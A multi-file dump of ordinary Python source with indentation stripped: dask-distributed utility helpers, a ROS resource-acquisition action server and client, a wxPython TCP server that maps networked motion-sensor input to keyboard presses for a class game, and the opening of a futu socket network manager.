raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [os.path.join('distributed', 'worker'),
os.path.join('distributed', 'scheduler'),
os.path.join('tornado', 'gen.py'),
os.path.join('concurrent', 'futures')]
while exc_traceback and any(b in exc_traceback.tb_frame.f_code.co_filename
for b in bad):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message",
str(e)[:n])
except Exception:
return Exception("Long error message",
type(e),
str(e)[:n])
else:
return e
if sys.version_info >= (3,):
# (re-)raising StopIteration is deprecated in 3.6+
exec("""def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
return result.value
yield result
""")
else:
# Returning non-None from generator is a syntax error in 2.x
def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
raise result
yield result
def _dump_to_queue(seq, q):
for item in seq:
q.put(item)
def iterator_to_queue(seq, maxsize=0):
q = Queue(maxsize=maxsize)
t = threading.Thread(target=_dump_to_queue, args=(seq, q))
t.daemon = True
t.start()
return q
def tokey(o):
""" Convert an object to a string.
Examples
--------
>>> tokey(b'x')
'x'
>>> tokey('x')
'x'
>>> tokey(1)
'1'
"""
typ = type(o)
if typ is unicode or typ is bytes:
return o
else:
return str(o)
def validate_key(k):
"""Validate a key as received on a stream.
"""
typ = type(k)
if typ is not unicode and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)"
% (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (istask(task) or
type(task) is list and any(map(_maybe_complex, task)) or
type(task) is dict and any(map(_maybe_complex, task.values())))
def str_graph(dsk, extra_values=()):
def convert(task):
if type(task) is list:
return [convert(v) for v in task]
if type(task) is dict:
return valmap(convert, task)
if istask(task):
return (task[0],) + tuple(map(convert, task[1:]))
try:
if task in dsk or task in extra_values:
return tokey(task)
except TypeError:
pass
return task
return {tokey(k): convert(v) for k, v in dsk.items()}
def seek_delimiter(file, delimiter, blocksize):
""" Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b''
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter):]
def read_block(f, offset, length, delimiter=None):
""" Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2**16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2**16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=''):
extension = '.' + extension.lstrip('.')
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
try:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
def ensure_bytes(s):
""" Turn string or bytes to bytes
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
if isinstance(s, memoryview):
return s.tobytes()
if isinstance(s, bytearray) or PY2 and isinstance(s, buffer): # noqa: F821
return bytes(s)
if hasattr(s, 'encode'):
return s.encode()
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s)
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
if hasattr(sys, "is_finalizing"):
def shutting_down(is_finalizing=sys.is_finalizing):
return is_finalizing()
else:
_shutting_down = [False]
def _at_shutdown(l=_shutting_down):
l[0] = True
def shutting_down(l=_shutting_down):
return l[0]
atexit.register(_at_shutdown)
shutting_down.__doc__ = """
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
def open_port(host=''):
""" Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in ('.py'): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == '.py': # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with ignoring(OSError):
os.remove(cache_file)
if ext in ('.egg', '.zip'):
if path not in sys.path:
sys.path.insert(0, path)
if ext == '.egg':
import pkg_resources
pkgs = pkg_resources.find_distributions(path)
for pkg in pkgs:
names_to_import.append(pkg.project_name)
elif ext == '.zip':
names_to_import.append(name)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(reload(import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter(object):
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ('index',)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def format_bytes(n):
""" Format bytes as text
>>> format_bytes(1)
'1 B'
>>> format_bytes(1234)
'1.23 kB'
>>> format_bytes(12345678)
'12.35 MB'
>>> format_bytes(1234567890)
'1.23 GB'
"""
if n > 1e9:
return '%0.2f GB' % (n / 1e9)
if n > 1e6:
return '%0.2f MB' % (n / 1e6)
if n > 1e3:
return '%0.2f kB' % (n / 1000)
return '%d B' % n
byte_sizes = {
'kB': 10**3,
'MB': 10**6,
'GB': 10**9,
'TB': 10**12,
'PB': 10**15,
'KiB': 2**10,
'MiB': 2**20,
'GiB': 2**30,
'TiB': 2**40,
'PiB': 2**50,
'B': 1,
'': 1,
}
byte_sizes = {k.lower(): v for k, v in byte_sizes.items()}
byte_sizes.update({k[0]: v for k, v in byte_sizes.items() if k and 'i' not in k})
byte_sizes.update({k[:-1]: v for k, v in byte_sizes.items() if k and 'i' in k})
def parse_bytes(s):
""" Parse byte string to numbers
>>> parse_bytes('100')
100
>>> parse_bytes('100 MB')
100000000
>>> parse_bytes('100M')
100000000
>>> parse_bytes('5kB')
5000
>>> parse_bytes('5.4 kB')
5400
>>> parse_bytes('1kiB')
1024
>>> parse_bytes('1e6')
1000000
>>> parse_bytes('1e6 kB')
1000000000
>>> parse_bytes('MB')
1000000
"""
s = s.replace(' ', '')
if not s[0].isdigit():
s = '1' + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:]
n = float(prefix)
multiplier = byte_sizes[suffix.lower()]
result = n * multiplier
return int(result)
timedelta_sizes = {
's': 1,
'ms': 1e-3,
'us': 1e-6,
'ns': 1e-9,
'm': 60,
'h': 3600,
'd': 3600 * 24,
}
tds2 = {
'second': 1,
'minute': 60,
'hour': 60 * 60,
'day': 60 * 60 * 24,
'millisecond': 1e-3,
'microsecond': 1e-6,
'nanosecond': 1e-9,
}
tds2.update({k + 's': v for k, v in tds2.items()})
timedelta_sizes.update(tds2)
timedelta_sizes.update({k.upper(): v for k, v in timedelta_sizes.items()})
def parse_timedelta(s, default='seconds'):
""" Parse timedelta string to number of seconds
Examples
--------
>>> parse_timedelta('3s')
3
>>> parse_timedelta('3.5 seconds')
3.5
>>> parse_timedelta('300ms')
0.3
>>> parse_timedelta(timedelta(seconds=3)) # also supports timedeltas
3
"""
if isinstance(s, timedelta):
return s.total_seconds()
if isinstance(s, Number):
s = str(s)
s = s.replace(' ', '')
if not s[0].isdigit():
s = '1' + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:] or default
n = float(prefix)
multiplier = timedelta_sizes[suffix.lower()]
result = n * multiplier
if int(result) == result:
result = int(result)
return result
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c))
for x, c in zip(zip(*rows), columns))
row_template = ('|' + (' %%-%ds |' * len(columns))) % widths
header = row_template % tuple(columns)
bar = '+%s+' % '+'.join('-' * (w + 2) for w in widths)
data = '\n'.join(row_template % r for r in rows)
return '\n'.join([bar, header, bar, data, bar])
if PY2:
def nbytes(frame, _bytes_like=(bytes, bytearray, buffer)): # noqa: F821
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
elif isinstance(frame, memoryview):
if frame.shape is None:
return frame.itemsize
else:
return functools.reduce(operator.mul, frame.shape,
frame.itemsize)
else:
return frame.nbytes
else:
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
return frame.nbytes
def PeriodicCallback(callback, callback_time, io_loop=None):
"""
Wrapper around tornado.IOLoop.PeriodicCallback, for compatibility
with removal of the `io_loop` parameter in Tornado 5.0.
"""
if tornado.version_info >= (5,):
return tornado.ioloop.PeriodicCallback(callback, callback_time)
else:
return tornado.ioloop.PeriodicCallback(callback, callback_time, io_loop)
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print('TIME WARNING', text, end - start)
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
def format_time(n):
""" format integers as time
>>> format_time(1)
'1.00 s'
>>> format_time(0.001234)
'1.23 ms'
>>> format_time(0.00012345)
'123.45 us'
>>> format_time(123.456)
'123.46 s'
"""
if n >= 1:
return '%.2f s' % n
if n >= 1e-3:
return '%.2f ms' % (n * 1e3)
return '%.2f us' % (n * 1e6)
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, **kwargs):
n = kwargs.pop('n', 10000)
self.deque = deque(maxlen=n)
super(DequeHandler, self).__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def fix_asyncio_event_loop_policy(asyncio):
"""
Work around https://github.com/tornadoweb/tornado/issues/2183
"""
class PatchedDefaultEventLoopPolicy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
"""Get the event loop.
This may be None or an instance of EventLoop.
"""
try:
return super().get_event_loop()
except RuntimeError:
# "There is no current event loop in thread"
loop = self.new_event_loop()
self.set_event_loop(loop)
return loop
asyncio.set_event_loop_policy(PatchedDefaultEventLoopPolicy())
def reset_logger_locks():
""" Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
# Only bother if asyncio has been loaded by Tornado
if 'asyncio' in sys.modules:
fix_asyncio_event_loop_policy(sys.modules['asyncio'])
|
AcquireRessource.py
|
#!/usr/bin/env python
# Action Server zur Organisation der Client-Verbindung zum Simulink-Modell
# Lucas Jürgens (BA), lucas.juergens@zubox.de, 2017-02
# Moritz Schappler, schappler@irt.uni-hannover.de
# (C) Institut für Regelungstechnik, Leibniz Universität Hannover
import rospy
import actionlib
import threading
from Queue import Queue
from pcu_common.msg import AcquireRessourceAction, AcquireRessourceGoal
class AcquirableRessource():
def __init__(self, action_topic):
self.acquired = False
self._as = actionlib.SimpleActionServer(action_topic, AcquireRessourceAction, auto_start=False)
self._as.register_goal_callback(self._goal_cb)
self._as.register_preempt_callback(self._preempt_cb)
self._as.start()
self._aborted_cb = None
self._acquired_cb = None
t = threading.Thread(target=self._check_for_abort)
t.start()
def register_acquired_cb(self, cb):
self._acquired_cb = cb
def register_aborted_cb(self, cb):
self._aborted_cb = cb
def _check_for_abort(self):
rate = rospy.Rate(50)
while not rospy.is_shutdown():
if self.acquired:
if not self._as.is_active():
self.acquired = False
if self._aborted_cb:
self._aborted_cb()
rate.sleep()
def break_acquirement(self):
if self.acquired:
self._as.set_aborted()
acquired = False
def _goal_cb(self):
self._as.accept_new_goal()
self.acquired = True
if self._acquired_cb:
self._acquired_cb()
def _preempt_cb(self):
self._as.set_aborted()
class AcquireRessource():
def __init__(self, action_topic):
self._ac = actionlib.SimpleActionClient(action_topic, AcquireRessourceAction)
self._queue = Queue() # Using a queue here, because python 2 doesnt know a timeout for semaphore.wait
self._lost_cb = None
self._timed_out = False
self.is_acquired = False
def register_lost_callback(self, cb):
self._lost_cb = cb
def release(self):
if self.is_acquired:
self._ac.cancel_all_goals()
self.is_acquired = False
def acquire(self, timeout):
if self.is_acquired:
return False
self._timed_out = False
if not self._ac.wait_for_server(rospy.Duration(timeout)):
self._timed_out = True
return False
goal = AcquireRessourceGoal()
self._ac.send_goal(goal, self._done_cb, self._active_cb)
try:
self._queue.get(True, timeout)
except:
self._timed_out = True
return False
return True
def _done_cb(self, a, b):
if self.is_acquired:
self.is_acquired = False
if self._lost_cb:
t = threading.Thread(target=self._lost_cb)
t.start()
def _active_cb(self):
if not self._timed_out:
self.is_acquired = True
self._queue.put(None)
else:
self._ac.cancel_goal()
|
server.py
|
#!/usr/bin/env python
# -*- Coding: UTF-8 -*-
# @Time : 12/8/18 7:02 PM
# @Author : Terry LAI
# @Email : terry.lai@hotmail.com
# @File : keyboard.py
from pymouse import PyMouse
from pykeyboard import PyKeyboard
from socket import socket, AF_INET, SOCK_STREAM
port = 20000
# -*- coding: utf-8 -*-
client_addr = []
client_socket = {}
###########################################################################
## Python code generated with wxFormBuilder (version Sep 12 2010)
## http://www.wxformbuilder.org/
##
## PLEASE DO "NOT" EDIT THIS FILE!
###########################################################################
import wx
from socketserver import ThreadingTCPServer
###########################################################################
## Class MotionGame
###########################################################################
class MotionGame(wx.Frame):
def __init__(self, parent):
wx.Frame.__init__(self, parent, id=wx.ID_ANY, title=wx.EmptyString, pos=wx.DefaultPosition,
size=wx.Size(500, 300), style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL)
self.SetSizeHintsSz(wx.DefaultSize, wx.DefaultSize)
bSizer11 = wx.BoxSizer(wx.VERTICAL)
self.m_staticText1 = wx.StaticText(self, wx.ID_ANY, u"ECE 5413 Motion Game", wx.DefaultPosition, wx.DefaultSize,
0)
self.m_staticText1.Wrap(-1)
bSizer11.Add(self.m_staticText1, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 5)
self.m_button1 = wx.Button(self, wx.ID_ANY, u"Start Server", wx.DefaultPosition, wx.DefaultSize, 0)
bSizer11.Add(self.m_button1, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 5)
self.m_staticText2 = wx.StaticText(self, wx.ID_ANY, u"server is down", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText2.Wrap(-1)
bSizer11.Add(self.m_staticText2, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 5)
gbSizer1 = wx.GridBagSizer(0, 0)
gbSizer1.SetFlexibleDirection(wx.BOTH)
gbSizer1.SetNonFlexibleGrowMode(wx.FLEX_GROWMODE_SPECIFIED)
self.m_staticText12 = wx.StaticText(self, wx.ID_ANY, u"Game 1", wx.Point(20, 20), wx.DefaultSize,
wx.ALIGN_CENTRE)
self.m_staticText12.Wrap(-1)
gbSizer1.Add(self.m_staticText12, wx.GBPosition(0, 0), wx.GBSpan(1, 1),
wx.ALL | wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT, 5)
self.m_button2 = wx.Button(self, wx.ID_ANY, u"Set Game 1", wx.DefaultPosition, wx.DefaultSize, 0)
gbSizer1.Add(self.m_button2, wx.GBPosition(0, 1), wx.GBSpan(1, 1), wx.ALL, 5)
self.m_staticText14 = wx.StaticText(self, wx.ID_ANY, u"Player 1", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText14.Wrap(-1)
gbSizer1.Add(self.m_staticText14, wx.GBPosition(0, 2), wx.GBSpan(1, 1), wx.ALL, 5)
self.m_staticText4 = wx.StaticText(self, wx.ID_ANY, u"disconnected", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText4.Wrap(-1)
gbSizer1.Add(self.m_staticText4, wx.GBPosition(0, 3), wx.GBSpan(1, 1), wx.ALL, 5)
bSizer11.Add(gbSizer1, 1, wx.EXPAND, 5)
gbSizer11 = wx.GridBagSizer(0, 0)
gbSizer11.SetFlexibleDirection(wx.BOTH)
gbSizer11.SetNonFlexibleGrowMode(wx.FLEX_GROWMODE_SPECIFIED)
self.m_staticText121 = wx.StaticText(self, wx.ID_ANY, u"Game 2", wx.Point(20, 20), wx.DefaultSize,
wx.ALIGN_CENTRE)
self.m_staticText121.Wrap(-1)
gbSizer11.Add(self.m_staticText121, wx.GBPosition(0, 0), wx.GBSpan(1, 1),
wx.ALL | wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT, 5)
self.m_button3 = wx.Button(self, wx.ID_ANY, u"Set Game 2", wx.DefaultPosition, wx.DefaultSize, 0)
gbSizer11.Add(self.m_button3, wx.GBPosition(0, 1), wx.GBSpan(1, 1), wx.ALL, 5)
self.m_staticText141 = wx.StaticText(self, wx.ID_ANY, u"Player 1", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText141.Wrap(-1)
gbSizer11.Add(self.m_staticText141, wx.GBPosition(0, 2), wx.GBSpan(1, 1), wx.ALL, 5)
self.m_staticText5 = wx.StaticText(self, wx.ID_ANY, u"disconnected", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText5.Wrap(-1)
gbSizer11.Add(self.m_staticText5, wx.GBPosition(0, 3), wx.GBSpan(1, 1), wx.ALL, 5)
self.m_staticText40 = wx.StaticText(self, wx.ID_ANY, u"Player 2", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText40.Wrap(-1)
gbSizer11.Add(self.m_staticText40, wx.GBPosition(0, 4), wx.GBSpan(1, 1), wx.ALL, 5)
self.m_staticText6 = wx.StaticText(self, wx.ID_ANY, u"disconnected", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText6.Wrap(-1)
gbSizer11.Add(self.m_staticText6, wx.GBPosition(0, 5), wx.GBSpan(1, 1), wx.ALL, 5)
bSizer11.Add(gbSizer11, 1, wx.EXPAND, 5)
bSizer12 = wx.BoxSizer(wx.VERTICAL)
self.m_staticText57 = wx.StaticText(self, wx.ID_ANY, u"Game 2 Link: ", wx.DefaultPosition, wx.Size(50, -1), 0)
self.m_staticText57.Wrap(-1)
self.m_staticText57.SetMaxSize(wx.Size(100, -1))
bSizer12.Add(self.m_staticText57, 1, wx.ALL | wx.EXPAND, 5)
self.m_textCtrl12 = wx.TextCtrl(self, wx.ID_ANY, u"http://www.4399.com/flash/187228_1.htm", wx.DefaultPosition,
wx.DefaultSize, 0)
bSizer12.Add(self.m_textCtrl12, 0, wx.ALL | wx.EXPAND, 5)
bSizer11.Add(bSizer12, 1, wx.EXPAND, 5)
self.SetSizer(bSizer11)
self.Layout()
self.Centre(wx.BOTH)
# Connect Events
self.m_button1.Bind(wx.EVT_BUTTON, self.start_server)
self.m_button2.Bind(wx.EVT_BUTTON, self.set_game1)
self.m_button3.Bind(wx.EVT_BUTTON, self.set_game2)
def __del__(self):
pass
# Virtual event handlers, overide them in your derived class
def start_server(self, event):
frame.m_staticText2.SetLabel("Server is Running !!! ")
print("start server")
timer = threading.Timer(timer_period, fun_timer)
timer.start()
# 第一对参数是(host, port)
server = ThreadingTCPServer(('', port), EchoHandler)
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
#sudo netstat -lntup|grep 20000
#ps -ef|grep python // 查看在python中的所有进程
#kill -9 51976 // -9指是强制关闭进程,有时候直接用`kill 51976`是杀不死进程的
def set_game1(self, event):
global mode
global mode_1_flag
global mode_2_flag
mode_1_flag = True
mode = 1
print("Mode 1")
for key,value in client_socket.items():
value.sendall(bytes([0x11,0x22,0x33]))
def set_game2(self, event):
global mode
global mode_1_flag
global mode_2_flag
mode_2_flag = True
mode = 2
print("Mode 2")
for key,value in client_socket.items():
try:
value.sendall(bytes([0x11, 0x22, 0x33]))
except IOError:
pass
else:
pass
m = PyMouse()
k = PyKeyboard()
from socketserver import BaseRequestHandler, TCPServer
buffer_size = 10
key_flag = False
import threading
timer_period = 0.1
def fun_timer():
global key_flag
#print('Hello Timer!')
key_flag = True
global timer
timer = threading.Timer(timer_period, fun_timer)
timer.start()
previous_key = 0
mode = 1
frame =None
mode_1_flag= False
mode_2_flag= False
d = {}
# 继承BaseRequestHandler这个base class,并重定义handle()
class EchoHandler(BaseRequestHandler):
def setup(self):
ip = self.client_address[0].strip() # 获取客户端的ip
port = self.client_address[1] # 获取客户端的port
print(ip+":"+str(port)+" is connect!")
client_addr.append(self.client_address) # 保存到队列中
client_socket[self.client_address] = self.request # 保存套接字socket
def finish(self):
print("client is disconnect!")
client_addr.remove(self.client_address)
del client_socket[self.client_addr]
def handle(self):
global key_flag
global previous_key
global mode_1_flag
global mode_2_flag
print('Got connection from', self.client_address)
print(type(self.request))
# self.request is the TCP socket connected to the client
count = 0
msg = []
while True:
# 8192代表每次读取8192字节
temp = self.request.recv(buffer_size)
msg.extend(temp)
while len(msg) >= 2 and (msg[0]!=0xa0 or msg[1]!=0xa1):
msg.pop(0)
if len(msg)<buffer_size:
continue
if not key_flag:
continue
up = msg[2]
down = msg[3]
left = msg[4]
right = msg[5]
node = msg[6]
if node == 1:
frame.m_staticText4.SetLabel("Connected !!! ")
frame.m_staticText5.SetLabel("Connected !!! ")
if node == 2:
frame.m_staticText6.SetLabel("Connected !!! ")
if mode == 1:
key = 0
if up and not left and not right:
key =1
if down and not left and not right:
key =2
if left:
key =3
if right:
key =4
if key != 0 and previous_key != key:
print(key)
if key == 1:
k.press_key("up")
print(" node 1 up")
# else:
# k.release_key("up")
if key == 2:
k.press_key("down")
print(" node 1 down")
# else:
# k.release_key("down")
if key == 3:
k.press_key("left")
print(" node 1 left")
# else:
# k.release_key("left")
if key == 4:
k.press_key("right")
print(" node 1 right")
# else:
# k.release_key("right")
previous_key = key
if mode == 2:
if node == 1:
if up == 1:
k.press_key("up")
print(" node 1 up")
else:
k.release_key("up")
if down == 1:
k.press_key("down")
print(" node 1 down")
else:
k.release_key("down")
if left == 1:
k.press_key("left")
print(" node 1 left")
else:
k.release_key("left")
if right == 1:
k.press_key("right")
print(" node 1 right")
else:
k.release_key("right")
if node == 2:
if up == 1:
k.press_key("w")
print(" node 2 up")
else:
k.release_key("w")
if down == 1:
k.press_key("s")
print(" node 2 down")
else:
k.release_key("s")
if left == 1:
k.press_key("a")
print(" node 2 left")
else:
k.release_key("a")
if right == 1:
k.press_key("d")
print(" node 2 right")
else:
k.release_key("d")
msg = []
#key_flag = False
if __name__ == '__main__':
app = wx.App() # 实例化一个主循环<br>
frame = MotionGame(None) # 实例化一个窗口<br>
frame.Show() # 调用窗口展示功能<br>
app.MainLoop() # 启动主循环
|
network_manager.py
|
import errno
import datetime
import threading
from time import sleep
from futu.common.utils import *
from futu.quote.quote_query import parse_head
from .err import Err
from .sys_config import SysConfig
from .ft_logger import *
if IS_PY2:
import selectors2 as selectors
import Queue as queue
else:
import queue
import selectors
class ConnStatus:
Start = 0
Connecting = 1
Connected = 2
Closed = 3
class SyncReqRspInfo:
def __init__(self):
self.event = threading.Event()
self.ret = RET_OK
self.msg = ''
self.data = None
class Connection:
def __init__(self, conn_id, sock, addr, handler):
self._conn_id = conn_id
self.opend_conn_id = 0
self.sock = sock
self.handler = handler
self._peer_addr = addr
self.status = ConnStatus.Start
self.keep_alive_interval = 10
self.last_keep_alive_time = datetime.now()
self.timeout = None
self.start_time = None
self.readbuf = bytearray()
self.writebuf = bytearray()
self.req_dict = {} # ProtoInfo -> req time
self.sync_req_dict = {} # ProtoInfo -> SyncReqRspInfo
@property
def conn_id(self):
return self._conn_id
@property
def peer_addr(self):
return self._peer_addr
def fileno(self):
return self.sock.fileno
def is_socket_exception_wouldblock(e):
has_errno = False
if IS_PY2:
if isinstance(e, IOError):
has_errno = True
else:
if isinstance(e, OSError):
has_errno = True
if has_errno:
if e.errno == errno.EWOULDBLOCK or e.errno == errno.EAGAIN or e.errno == errno.EINPROGRESS:
return True
return False
def make_ctrl_socks():
LOCAL_HOST = '127.0.0.1'
if IS_PY2:
svr_sock = []
lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def svr_sock_func():
try:
sock, _ = lsock.accept()
svr_sock.append(sock)
except Exception as e:
logger.warning('Ctrl sock fail: {}'.format(str(e)))
try:
lsock.bind((LOCAL_HOST, 0))
_, port = lsock.getsockname()[:2]
lsock.listen(1)
thread = threading.Thread(target=svr_sock_func)
thread.start()
client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_sock.settimeout(0.1)
client_sock.connect((LOCAL_HOST, port))
thread.join()
return svr_sock[0], client_sock
except Exception as e:
logger.warning('Ctrl sock fail: {}'.format(str(e)))
return None, None
finally:
lsock.close()
else:
return socket.socketpair()
class NetManager:
_default_inst = None
_default_inst_lock = threading.Lock()
@classmethod
def default(cls):
with cls._default_inst_lock:
if cls._default_inst is None:
cls._default_inst = NetManager()
return cls._default_inst
def __init__(self):
self._use_count = 0
self._lock = threading.RLock()
self._mgr_lock = threading.Lock() # Used to control start and stop
self._create_all()
def _close_all(self):
for sel_key in list(self._selector.get_map().values()):
self._selector.unregister(sel_key.fileobj)
sel_key.fileobj.close()
self._selector.close()
self._selector = None
if self._r_sock:
self._r_sock.close()
self._r_sock = None
if self._w_sock:
self._w_sock.close()
self._w_sock = None
def _create_all(self):
self._selector = selectors.DefaultSelector()
self._next_conn_id = 1
self._req_queue = queue.Queue()
self._sync_req_timeout = 12
self._thread = None
now = datetime.now()
self._last_activate_time = now
self._last_check_req_time = now
self._r_sock, self._w_sock = make_ctrl_socks()
self._selector.register(self._r_sock, selectors.EVENT_READ)
def connect(self, addr, handler, timeout):
with self._lock:
conn_id = self._next_conn_id
self._next_conn_id += 1
def work():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024 * 1024)
conn = Connection(conn_id, sock, addr, handler)
conn.status = ConnStatus.Connecting
conn.start_time = datetime.now()
conn.timeout = timeout
sock.setblocking(False)
self._selector.register(sock, selectors.EVENT_READ | selectors.EVENT_WRITE, conn)
try:
sock.connect(addr)
except Exception as e:
if not is_socket_exception_wouldblock(e):
conn.handler.on_error(conn.conn_id, str(e))
self.close(conn.conn_id)
return RET_ERROR, str(e), 0
return RET_OK, '', conn_id
self._req_queue.put(work)
self._w_sock.send(b'1')
return RET_OK, '', conn_id
def poll(self):
now = datetime.now()
events = self._selector.select(0.02)
for key, evt_mask in events:
if key.fileobj == self._r_sock:
self._r_sock.recv(1024)
while True:
try:
work = self._req_queue.get(block=False)
work()
except queue.Empty:
break
continue
conn = key.data
if evt_mask & selectors.EVENT_WRITE != 0:
self._on_write(conn)
if evt_mask & selectors.EVENT_READ != 0:
self._on_read(conn)
activate_elapsed_time = now - self._last_activate_time
check_req_elapsed_time = now - self._last_check_req_time
is_activate = activate_elapsed_time.total_seconds() >= 0.05
is_check_req = check_req_elapsed_time.total_seconds() >= 0.1
if is_activate or is_check_req:
for key in list(self._selector.get_map().values()):
if key.fileobj == self._r_sock:
continue
conn = key.data
